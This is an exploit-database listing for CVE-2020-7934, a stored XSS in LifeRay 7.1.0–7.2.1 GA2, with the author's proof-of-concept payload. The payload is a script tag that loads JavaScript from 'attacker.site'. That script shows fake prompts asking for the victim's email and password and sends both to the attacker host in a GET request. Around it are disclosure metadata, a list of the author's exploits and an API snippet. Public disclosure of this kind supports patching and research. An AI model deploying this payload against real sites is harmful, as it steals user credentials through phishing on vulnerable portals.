Become a patron and gain access to the dashboard, Schedule scans, API and Search patron
"LifeRay 7.2.1 GA2 - Stored XSS"
Author
3ndG4me
Platform
multiple
Release date
2020-11-23
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 | # Exploit Title: LifeRay 7.2.1 GA2 - Stored XSS # Date: 10/05/2020 # Exploit Author: 3ndG4me # Vendor Homepage: https://www.liferay.com/ # Software Link: https://www.liferay.com/ # Version: 7.1.0 -> 7.2.1 GA2 (REQUIRED) # Tested on: Debian Linux # CVE : CVE-2020-7934 # Public Exploit/Whitepaper: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934 # NOTE: The attached proof of concept is a javascript payload, submitted as a ".txt" file to attach via email as ".js" is often blocked. // CVE-2020-7934 Cred Phishing Example Attack // Author: 3ndG4me // Github: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934 // Host this payload with your site and paste in this script tag into a vulnerable field with your URL replaced where relevant: // <SCRIPT SRC="//attacker.site/cve-2020-7934.js"> var email = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your email:", ""); var password = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your password:", ""); console.log(email); console.log(password); var url = "http://attacker.site/" + email + ":" + password; $.get(url); |
| Release Date | Title | Type | Platform | Author |
|---|---|---|---|---|
| 2020-11-23 | "LifeRay 7.2.1 GA2 - Stored XSS" | webapps | multiple | 3ndG4me |
| 2020-10-12 | "Cisco ASA and FTD 9.6.4.42 - Path Traversal" | webapps | hardware | 3ndG4me |
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/49091/?format=json')
For full documentation follow the link above